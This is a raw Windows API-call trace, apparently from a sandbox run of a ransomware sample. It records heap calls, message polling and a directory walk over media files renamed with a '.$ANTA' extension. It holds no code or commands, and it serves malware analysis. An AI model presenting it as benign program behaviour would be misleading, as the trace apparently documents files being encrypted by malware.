[0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0107.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0107.719] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.719] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.719] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacd4e1b, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xacd4e1b, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xadb9b1f, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xca10, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="38VodG.mp4.$ANTA", cAlternateFileName="38VODG~1.$AN")) returned 1 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0107.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0107.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.720] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.720] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0107.720] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0107.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.720] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0107.721] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeeab80, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xaeeab80, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xaf835a6, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xd0d0, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="C98TxuIy1khtVyZ_cTR.avi.$ANTA", cAlternateFileName="C98TXU~1.$AN")) returned 1 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0107.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.721] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0107.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0107.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0107.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0107.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0107.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.765] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0107.766] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0107.766] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0107.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0107.766] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb126ef5, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xb126ef5, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xb1ff5dc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x10d80, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="Hf dn4y4LLHbc.swf.$ANTA", cAlternateFileName="HFDN4Y~1.$AN")) returned 1 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.767] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.767] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0107.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0107.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0107.768] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.768] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0107.768] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a5f6e, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xb2a5f6e, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xb37383e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x33a0, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="jgIUi-yVs0307RW IcX.mkv.$ANTA", cAlternateFileName="JGIUI-~1.$AN")) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0107.768] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.768] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0107.768] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.768] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.769] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9434d1, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xb9434d1, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xba0219a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7650, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="kdyPGegxQAqdUuFtfW.mkv.$ANTA", cAlternateFileName="KDYPGE~1.$AN")) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.769] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.769] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0107.769] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0107.769] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) 